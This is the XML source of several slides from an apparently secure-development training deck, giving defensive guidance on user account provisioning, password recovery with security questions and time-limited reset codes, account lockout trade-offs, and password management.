            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assigning user’s initial:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Groups and roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application’s user account management features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be part of the app’s own functionality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May leverage user management features of the platform they run on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: Microsoft Windows (for Windows Desktop or network applications, for example) or Google (for applications running on the Google Cloud Platform).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you're using the platform's user provisioning features, make sure you understand the security architecture for that platform, so you can leverage it properly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you're developing your own user account management features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using a time-tested proven application framework and becoming thoroughly familiar with its functioning, limitations, and any known vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your user account management interface is web-based, make sure you have applied all of the typical web security guidelines.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F62D19F-1A1C-4FD8-A1E0-3655B0A17D00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C56492-BC0E-4ABB-84E5-2B0DE33BD7A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6757856" y="1067327"/>
            <a:ext cx="2067563" cy="2103120"/>
            <a:chOff x="6652821" y="944880"/>
            <a:chExt cx="2461955" cy="2504295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6146" name="Picture 2" descr="Image result for new user png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA9D573-EE73-4F60-AF24-DCC263ED1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821" y="1182225"/>
              <a:ext cx="2266950" cy="2266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B00973-DCC9-40DC-944D-1F1ACDEFF16C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8020664" y="944880"/>
              <a:ext cx="1094112" cy="2217238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="11500" b="1" dirty="0">
                  <a:ln w="28575">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:ln>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="765565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Password Recovery (Slide 1 of 5) </a:t>
            </a:r>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A622D6B4-9D36-4C18-A8C6-36D621CD2782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="4693920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2274215">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6527569">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>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Recovery Step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1) Gather Identity Data or Security Questions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Ask the user to recall multiple pieces of specific information they provided when they first registered.</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562326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mn-lt"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>2) Verify Security Questions</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Verify that each piece of data is correct for the given user name. If anything is incorrect, or if the user name is not recognized, display a generic error message such as “Sorry, invalid data.”</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If all submitted data is correct, display at least two of the user's security questions, along with input fields for the answers.</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The answer fields should be part of a single HTML form.</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Don't provide a drop-down list for the user to select which questions to answer.</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Don't pass the user name as a parameter (hidden or otherwise) when the form on this page is submitted. The user name should be stored with the server-side session.</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Security questions are generally easier to guess than a good password. To impede an attacker, lock out the user account after a small number (3 to 5) of failed guesses for a reasonable duration (at least 5 minutes). Then, challenge the user with some form of challenge token (reset code) per standard multi-factor workflow (see step 3).</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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14180871"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338021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Password Recovery (Slide 2 of 5)</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A622D6B4-9D36-4C18-A8C6-36D621CD2782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="4395216"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2274215">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6527569">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>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Recovery Step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3) Send a Token Over a Side-Channel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Lock out the user's account immediately.</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Use SMS or some other side channel to send a randomly generated reset code having 8 or more characters. The side channel adds a layer of defense, another barrier for a hacker to overcome.</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Limit the lifetime of the reset code (e.g., no more than 20 minutes).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Once a user's password has been reset, the reset code should no longer be valid.</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562326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mn-lt"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>4) Allow user to change password in the existing session</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Ensure the user has completed steps 1 and 2 correctly before performing this step, to prevent an attacker from directly navigating to the URL for this page.</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Display a simple form with one input field for the code, one for the new password, and one to confirm the new password.</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Verify the user provides the correct code.</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Enforce all password complexity requirements that exist in other areas of the application.</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Don't pass the user name as a parameter when the form is submitted.</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Complete the reset before any other operations are performed by the user. The user should not be able to simply navigate to another page in the application. </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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14180871"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355591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Password Recovery (Slide 3 of 5)</a:t>
            </a:r>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A622D6B4-9D36-4C18-A8C6-36D621CD2782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="2511552"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2274215">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6527569">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>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Recovery Step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5) Logging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Keep audit records when password change requests are submitted:</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Whether or not security questions were answered</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When reset messages were sent to users</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When users utilize the reset code</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Failed attempts to answer security questions</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="742950" marR="0" lvl="1"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Failed attempted use of expired reset codes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For each event, include time, IP address, and browser information to help spot trends of suspicious use.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5623263"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289068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Password Recovery (Slide 4 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564F067D-5C59-4E7E-BAB3-0FF8A9084FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user first registered, the software collected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple pieces of specific information (security questions) that the user can be asked to provide later, if necessary, to recover from a lost password. The answers should be consistent, something users are likely to remember, and not something easily guessed or researched by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A "side channel" through which password recovery information can be sent to the legitimate user, such as an email address, SMS text number, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You take the usual security protections for client-side code in the password recovery feature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358862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Password Recovery (Slide 5 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564F067D-5C59-4E7E-BAB3-0FF8A9084FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever a successful password reset occurs, the session should be invalidated and the user redirected to the login page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strength of questions used for reset should vary based on the nature of the credential. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrator credentials should have a higher requirement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ideal implementation should rotate the questions asked in order to avoid automation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a user's application account has been compromised, email may also have been compromised, so tokens that do not involve email, such as SMS or a mobile soft-token, are best.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351785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Account Lockouts (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278971AA-A2D6-4234-9CB0-F00187B72EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1307130"/>
            <a:ext cx="6744676" cy="5138340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides protection against a brute force password-guessing attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically occurs after 3 to 5 failed login attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can only be unlocked:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After a certain period of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Through a self-service unlock mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Through intervention by an administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May provide useful protection in some scenarios.</a:t>
            </a:r>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Image result for lockout tag png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736B1C21-4D0A-4E87-B4B8-8B0AFAEDD6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78"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="1599566"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395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F938-B88A-4CE9-96C5-B649AB94972C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account Lockouts (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278971AA-A2D6-4234-9CB0-F00187B72EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1307130"/>
            <a:ext cx="6744676" cy="5138340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are potential drawbacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker could cause a Denial of Service attack or diversion by locking out large numbers of accounts. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker could use the feature to identify valid user names, depending on differences in application behavior between failed logins to existing accounts versus accounts that don't exist.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be ineffective against some attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slow attacks that try only a few passwords every hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks that try one password against a large list of user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker uses a user name/password combo list and guesses correctly on the first couple of attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Powerful accounts such as administrator accounts often bypass lockout policy, but these are the most desirable accounts to attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some systems lock out administrator accounts only on network-based logins.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A3D93F-AC58-4483-9576-9BF422E68058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Image result for lockout tag png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736B1C21-4D0A-4E87-B4B8-8B0AFAEDD6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78"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="1599566"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3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Password Management (Slide 1 of 2)</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19200"/>
            <a:ext cx="6897076" cy="5023338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send non-temporary passwords only over an encrypted connection or as encrypted data (such as in an encrypted email). Temporary passwords associated with email resets may be an exception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce password complexity requirements established by policy or regulation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent password re-use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hide password entry on the user's screen by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable accounts after an established number of failed login attempts to prevent brute force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require the same level of security controls for password reset and changing operations as you require for account creation and authentication.</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C9899-0690-47AE-AE44-D1CC23715785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D4C1E2-8AD8-4229-97B5-989671C9D393}"/>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4E2CD111-947E-47B7-898D-D885888ED226}"/>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Password</a:t>
              </a:r>
              <a:br>
                <a:rPr kumimoji="0" lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
